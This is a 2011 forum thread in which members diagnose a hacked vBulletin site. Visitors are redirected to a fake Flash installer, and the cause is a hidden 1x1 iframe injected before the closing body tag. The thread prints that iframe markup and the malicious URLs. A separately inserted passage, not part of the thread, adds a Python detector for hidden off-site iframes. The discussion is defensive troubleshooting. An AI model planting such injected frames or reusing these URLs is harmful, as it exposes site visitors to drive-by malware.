Redirect problems?



Dave Martell
11-12-2011, 07:53 PM
I have two reports of the site url being redirected automatically. Is anyone having this problem?

ajhuff
11-12-2011, 08:07 PM
Nope.

-AJ

Pensacola Tiger
11-12-2011, 08:08 PM
Yes, but only with Safari on OS X.

It redirects to http://94.199.51.3/FlashPlayer-11-4-macos.pkg, http://adobeflashplayer.uk.to/4f/

That downloads FlashPlayer-11-macos.pkg, and if you are allowing downloads to launch automatically, you're pwned.

It then goes to www.google.com to cover its tracks.

Vertigo
11-12-2011, 08:14 PM
NoScript blocks attempts for the site to load hXXp:superbesttraf.orge.pl and hXXp:www.cookaround.com -- If you're allowing scripts globally, you're probably allowing those sites too. If you're not sure, watch the bottom of your screen as you load the forum and you will see those sites quickly load as well.

Burl Source
11-12-2011, 08:16 PM
Another forum member who uses Safari sent me an email.
Said he is getting redirected to a Flash site as well.

Pensacola Tiger
11-12-2011, 08:18 PM
Another forum member who uses Safari sent me an email.
Said he is getting redirected to a Flash site as well.

Tell him to use Chrome or Firefox. I haven't been able to figure out how to get Safari to work.

Burl Source
11-12-2011, 08:18 PM
I just tried reloading and a couple other addresses are flashing across the bottom of my screen.
I use Firefox. No redirects but the other addresses showed for a fraction of a second at the bottom of my page.

Dave Martell
11-12-2011, 08:21 PM
I just tried reloading and a couple other addresses are flashing across the bottom of my screen.
I use Firefox. No redirects but the other addresses showed for a fraction of a second at the bottom of my page.


I just tried this and got the same thing. I'm using Chrome which is blocking it but nonetheless it looks like we have a problem. Stinking hackers.

Vertigo
11-12-2011, 08:21 PM
I just tried reloading and a couple other addresses are flashing across the bottom of my screen.
NoScript is your friend, people!

mr drinky
11-12-2011, 08:32 PM
Both of my Macs won't properly direct to KKF. I am on an ancient PC right now. My redirects end up at Google, so I assumed it was the Google Redirect Virus. Maybe a file in one of the threads is spreading that virus?

k.

Dave Martell
11-12-2011, 09:11 PM
I'm on it guys.

SpikeC
11-12-2011, 09:44 PM
My Mac book is redirecting, but my iPad is not.

ecchef
11-12-2011, 09:45 PM
I'm navigating ok, but I do see some bullsh!t www.cookaround.com link flash by. I also now have to double click to back arrow.

mr drinky
11-12-2011, 09:57 PM
Both of my Macs are working properly now.

k.

Eamon Burke
11-12-2011, 09:58 PM
Hmmm no issues here.

Chrome on win 7, android on my galaxy s.

UglyJoe
11-12-2011, 10:11 PM
I'm also still having the redirect problems. Safari, here.

littleroundman
11-12-2011, 10:39 PM
Eset Nod 32 antivirus is indicating:

13/11/2011 11:49:12 AM HTTP filter archive http://superbesttraf.orge.pl/iframe.php?id=406x8gaw3trjcn1wx4kmv41roybsmal HTML/Iframe.B.Gen virus connection terminated - quarantined \Owner Threat was detected upon access to web by the application: C:\Internet\Firefox 4\firefox.exe.

EdipisReks
11-12-2011, 10:41 PM
I'm also still having the redirect problems. Safari, here.

same.

Vertigo
11-12-2011, 10:47 PM
My redirects end up at Google, so I assumed it was the Google Redirect Virus. Maybe a file in one of the threads is spreading that virus?

k.
I don't think this is a Google Redirect Virus thing. It appears for all intents and purposes to be an HTML:Iframe-inf infection, though there could be more going on behind the scenes.

If you're using Chrome, Firefox with NoScript, IE with Java disabled or a Smartphone you should be fine--though I did just get a hit on my IDS an hour or two ago indicating that the orge.pl site was trying to give me a worm. Lulz.

Wrap 'em up, boys.

tk59
11-12-2011, 10:57 PM
I haven't seen anything on IE or Firefox.

SpikeC
11-12-2011, 11:07 PM
This seems to be related to Flash. It is affecting Safari on my Mac book, but not safari on my iPad, which does not allow flash.

mr drinky
11-12-2011, 11:12 PM
NoScript blocks attempts for the site to load hXXp:superbesttraf.orge.pl

Maybe it is the newest member, PolishAvenger ;) Just kidding, but when this stuff happens, I do sort of think about those crazy threats from MadRookie way back when. I'm sure it has nothing to do with him, but it did cross my mind.

k.

Vertigo
11-12-2011, 11:14 PM
I haven't seen anything on IE or Firefox.

It may be transparent, but regardless this is what's happening: (right click for big)

http://www.souppilgrim.com/orglif/thing.jpg

Those should most definitely not be there, and the first one (the Iframe infection orge.pl) is possibly malicious. I suspect the second one is just using our traffic to increase its own impression.

Vertigo
11-12-2011, 11:17 PM
Maybe it is the newest member, PolishAvenger ;)
That's ... strangely ominous... lol

JBroida
11-12-2011, 11:25 PM
this is what it is in your code dave:
</div>



</div><div style="display:none"><iframe src="http://www.cookaround.com/cook/robots.php" width="1" height="1"></iframe></div>

</body>

</html>

it's right at the end of your page's code before the end of the body
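
A check a site admin could run over rendered pages or template files to catch the kind of injected frame quoted in the post above. This is an added example, not code from the thread or from vBulletin; the host name `forum.example`, the function names and the sample markup are assumptions made for illustration. It flags an iframe only when it is both off-site and concealed (hidden by CSS on itself or an ancestor, or sized 1x1 or smaller).

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

VOID = set("area base br col embed hr img input link meta source track wbr".split())
HIDDEN_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def _tiny(value):  # True for a width/height of 0 or 1, with or without "px"
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value or "")
    return bool(m) and int(m.group(1)) <= 1

class HiddenFrameFinder(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.stack, self.findings = [], []  # open elements; flagged iframes

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        hidden_here = bool(HIDDEN_CSS.search(a.get("style", "")))
        if tag == "iframe":
            host = (urlparse(a.get("src", "")).hostname or "").lower()
            reasons = []
            if hidden_here or any(h for _, h in self.stack):
                reasons.append("hidden by CSS")
            if _tiny(a.get("width")) or _tiny(a.get("height")):
                reasons.append("1x1 or smaller")
            # Flag only frames that are both off-site and concealed.
            if host and host != self.site_host and reasons:
                self.findings.append((a["src"], reasons))
        if tag not in VOID:
            self.stack.append((tag, hidden_here))

    def handle_endtag(self, tag):
        # Pop back to the matching open tag; tolerates sloppy markup.
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break

def find_hidden_iframes(html, site_host):
    finder = HiddenFrameFinder(site_host)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample: a visible same-site frame, then the page tail from the post.
SAMPLE = ('<div><iframe src="http://forum.example/chat" width="400" height="300">'
          '</iframe></div><div style="display:none"><iframe src="http://www.cookaround.com'
          '/cook/robots.php" width="1" height="1"></iframe></div></body></html>')
```

Calling `find_hidden_iframes(SAMPLE, "forum.example")` reports only the concealed off-site frame; the visible same-site one is ignored.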

Vertigo
11-12-2011, 11:31 PM
Can you find where the other one is hiding Jon? I'm not seeing it anywhere.

JBroida
11-12-2011, 11:35 PM
i think it's hidden in the iframe, but i don't really want to look into that from my home laptop right now

Vertigo
11-13-2011, 12:18 AM
Oh derp. Yep. Sup Google. (http://www.google.com/safebrowsing/diagnostic?site=cookaround.com)

PierreRodrigue
11-13-2011, 12:48 AM
My anti virus just blocked a script trying to open a PM. I aint got no 'puter savy, but it doesn't seem to have dug in.

sw2geeks
11-13-2011, 01:32 AM
I also get the redirect using Firefox on the mac

markk
11-13-2011, 09:01 AM
mac w/safari here. I was getting the redirect but not any longer.

SpikeC
11-13-2011, 12:57 PM
Seems fixed now!

JBroida
11-13-2011, 01:03 PM
still there in the code from what i can see

Burl Source
11-13-2011, 01:08 PM
the cookaround thing is still there

JohnnyChance
11-13-2011, 01:47 PM
It's time like these that it sucks to have attack-vulnerable PC and not a Mac.....oh....wait. Nvm.

JBroida
11-13-2011, 02:58 PM
It's time like these that it sucks to have attack-vulnerable PC and not a Mac.....oh....wait. Nvm.

haha

UglyJoe
11-13-2011, 05:30 PM
It's time like these that it sucks to have attack-vulnerable PC and not a Mac.....oh....wait. Nvm.

Well, I'm on a Mac, and the redirect happened... but nothing happened because of it. And if something had happened, I could have just dragged it to the trash and emptied it... Win.

mr drinky
11-13-2011, 06:26 PM
My anti virus just blocked a script trying to open a PM. I aint got no 'puter savy, but it doesn't seem to have dug in.

I almost made my signature "Pierre aint got no 'puter savy."

k.

Andrew H
11-13-2011, 06:28 PM
It's time like these that it sucks to have attack-vulnerable PC and not a Mac.....oh....wait. Nvm.

Just what I was thinking, sadly I have one of both.

Dave Martell
11-13-2011, 06:58 PM
I lost one of the redirects but picked up one for Photobucket....argh

Vertigo
11-13-2011, 07:02 PM
It's time like these that it sucks to have attack-vulnerable PC and not a Mac.....oh....wait. Nvm.
I'd rather have a car that can cruise at 120 miles an hour, and keep it secure, than be stuck with a car that maxes at 50 and gloat because nobody wants to steal it.

;)

Vertigo
11-13-2011, 07:05 PM
I lost one of the redirects but picked up one for Photobucket....argh

Before doing anything else, upgrade to the newest version of vBulletin. You're running old, exploited software. Even if you fix the problem it will come back the next time an Evil Robot stumbles upon your site.

mr drinky
11-13-2011, 07:12 PM
Vertigo and Jon have gone all Rain Man on us with forum troubleshooting...code, updates...

I wouldn't doubt they have both already traced the person responsible and are heading out together in a non-descript white conversion van to go kick some butt -- possibly with Jon's zombie killer shop blade.

k.

Andrew H
11-13-2011, 07:35 PM
I'd rather have a car that can cruise at 120 miles an hour, and keep it secure, than be stuck with a car that maxes at 50 and gloat because nobody wants to steal it.

;)
Because Macs are the high performance computers of the world?

Vertigo
11-13-2011, 07:55 PM
Because Macs are the high performance computers of the world?
That depends upon your definition of performance, doesn't it. You can't exploit a system with nothing to exploit, and that pertains to both end users and ebil robots. Lol.

Dave Martell
11-13-2011, 08:30 PM
Vertigo and Jon have gone all Rain Man on us with forum troubleshooting...code, updates...

I wouldn't doubt they have both already traced the person responsible and are heading out together in a non-descript white conversion van to go kick some butt -- possibly with Jon's zombie killer shop blade.

k.


The RainMen have fixed the forum! :D

Yup, I found the corrupt line of code based on what they showed here in this thread. Thanks geeks (I mean - guys!). :wink: :doublethumbsup:

Dave Martell
11-13-2011, 08:41 PM
Can you confirm that the re-direct is gone?

Pensacola Tiger
11-13-2011, 08:47 PM
Can you confirm that the re-direct is gone?

I'm not seeing it anymore.

Vertigo
11-13-2011, 08:50 PM
Can you confirm that the re-direct is gone?

I'm on the road right now so I can't tell. I can see, though, that the forum version is still the old vulnerable version, so even if it's gone right now it won't be gone long. ;)

PierreRodrigue
11-13-2011, 08:55 PM
Hahaha! "nine cans of ravioli..." and "sauce flavored with meet" That's funny!! :D

Dave Martell
11-13-2011, 08:58 PM
I can see, though, that the forum version is still the old vulnerable version, so even if it's gone right now it won't be gone long. ;)

I can't do this myself, I have to have the people we pay to do these things do this. Anyway, there's a new version every other day so it'll never be up to date. :)

Dave Martell
11-13-2011, 08:59 PM
I'm not seeing it anymore.


Booyah! :D

Vertigo
11-13-2011, 09:19 PM
I can't do this myself, I have to have the people we pay to do these things do this. Anyway, there's a new version every other day so it'll never be up to date. :)

Being vigilant in staying up to date against an ever-changing tech curve is one thing; using an old iteration of software which is proven vulnerable to SQL scripting and iFrame injections is another. Anyways, it's resolved for the time being! Woot!

Dave Martell
11-13-2011, 09:41 PM
I can't argue with you on that.

add
11-13-2011, 11:00 PM
Because Macs are the high performance computers of the world?

Not always highest performance.

But perhaps just an extremely stable, off the shelf, user friendly, economical (long term), well supported, and ever increasingly popular choice... :razz: